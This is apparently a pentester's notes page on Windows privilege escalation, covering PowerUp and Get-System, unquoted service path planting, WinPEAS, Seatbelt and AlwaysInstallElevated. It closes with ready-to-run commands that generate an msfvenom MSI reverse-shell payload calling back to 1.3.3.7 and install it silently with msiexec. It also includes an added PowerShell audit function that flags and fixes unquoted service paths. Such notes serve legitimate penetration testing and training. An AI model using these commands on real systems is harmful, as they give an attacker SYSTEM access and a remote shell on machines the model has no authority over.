# Privilege Escalation

### PowerShellMafia

Always try to use the dev branch. PowerView has some useful functions.

* <https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1>
* <https://github.com/PowerShellMafia/PowerSploit/blob/dev/Privesc/PowerUp.ps1>

```powershell
powershell.exe -c "Import-Module C:\Users\Public\PowerUp.ps1; Invoke-AllChecks"
powershell.exe -c "Import-Module C:\Users\Public\Get-System.ps1; Get-System"
```

### Unquoted Service Paths

Let's say a service has an unquoted binary path like the one below.

`C:\Program Files\IObit\Advanced SystemCare\ASCService.exe`

Because the path is unquoted, every space is treated as a possible end of the executable name, so Windows will try to execute it in the following order:

* `C:\Program.exe`
* `C:\Program Files\IObit\Advanced.exe`
* `C:\Program Files\IObit\Advanced SystemCare\ASCService.exe`

If we can plant an executable at one of the intermediate paths above, the service will run it instead of the real binary and we can elevate privileges.

* Please note that we need to be able to either restart the service or reboot the machine for the planted binary to run; otherwise this is of little use.

#### Enumerating unquoted service paths

```cmd
:: keep auto-start services, drop anything under C:\Windows, drop paths that are already quoted
wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
```
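A PowerShell audit of the same condition, added here as an example rather than code from the page or from PowerSploit: it reproduces the probe order shown above for every unquoted service path, flags probe directories with write access for broad groups (a heuristic assumption), and prints the `sc.exe` command that quotes the path. `Get-UnquotedServicePath` is a hypothetical name.

```powershell
# Added audit example, not from the original page. Lists services with an
# unquoted, space-containing image path, the intermediate paths Windows probes,
# probe directories with weak ACLs (heuristic), and the quoting fix. Run as admin.
function Get-UnquotedServicePath {
    Get-CimInstance -ClassName Win32_Service |
        Where-Object {
            $_.PathName -and
            -not $_.PathName.StartsWith('"') -and
            $_.PathName -notmatch '^[A-Za-z]:\\Windows\\' -and
            $_.PathName -match ' '
        } |
        ForEach-Object {
            # The binary is everything up to the first ".exe"; the rest is arguments.
            $m = [regex]::Match($_.PathName, '^.*?\.exe', 'IgnoreCase')
            $binary = if ($m.Success) { $m.Value } else { $_.PathName }
            $svcArgs = $_.PathName.Substring($binary.Length)

            # Each space in the binary path yields one path Windows tries first.
            $parts = $binary -split ' '
            $candidates = for ($i = 1; $i -lt $parts.Count; $i++) {
                ($parts[0..($i - 1)] -join ' ') + '.exe'
            }

            # Heuristic: a probe directory is risky when Users/Everyone/Authenticated
            # Users hold an Allow ACE with write-class rights on it.
            $weakDirs = $candidates | ForEach-Object { Split-Path $_ -Parent } |
                Sort-Object -Unique | Where-Object { Test-Path $_ } |
                Where-Object {
                    (Get-Acl $_ -ErrorAction SilentlyContinue).Access | Where-Object {
                        $_.AccessControlType -eq 'Allow' -and
                        $_.IdentityReference -match 'Users|Everyone' -and
                        $_.FileSystemRights -match 'Write|Modify|FullControl'
                    }
                }

            # cmd.exe syntax: sc.exe config "Name" binPath= "\"C:\path with spaces\x.exe\" args"
            $quoted = ('"' + $binary + '"' + $svcArgs) -replace '"', '\"'
            [pscustomobject]@{
                Service     = $_.Name
                PathName    = $_.PathName
                Candidates  = $candidates
                WeakAclDirs = @($weakDirs | Where-Object { $_ })
                Remediation = "sc.exe config `"$($_.Name)`" binPath= `"$quoted`""
            }
        }
}

Get-UnquotedServicePath | Format-List
```

The `Remediation` string is meant to be pasted into cmd.exe, where `\"` is how `sc.exe` accepts embedded quotes in `binPath=`.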

### WinPeas

It is a great privilege escalation enumeration tool. Find the releases below and simply execute the binary.

* <https://github.com/carlospolop/PEASS-ng/releases>

```
.\winPEASx64_ofs.exe notcolor quiet
```

### Seatbelt

* <https://github.com/GhostPack/Seatbelt>

### Always Install Elevated

* <https://www.hackingarticles.in/windows-privilege-escalation-alwaysinstallelevated/>

To detect whether the system is vulnerable, query both registry hives:

```
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
```

If AlwaysInstallElevated is enabled, both queries should show `AlwaysInstallElevated REG_DWORD 0x1`; the policy only takes effect when the value is set under both HKCU and HKLM.

Exploiting it is pretty simple. Generate an msi payload,

```
msfvenom -p windows/shell/reverse_tcp lhost=1.3.3.7 lport=9001 -f msi > shell.msi
```

Execute it (the file name must match the payload generated above):

```
msiexec /quiet /qn /i shell.msi
```
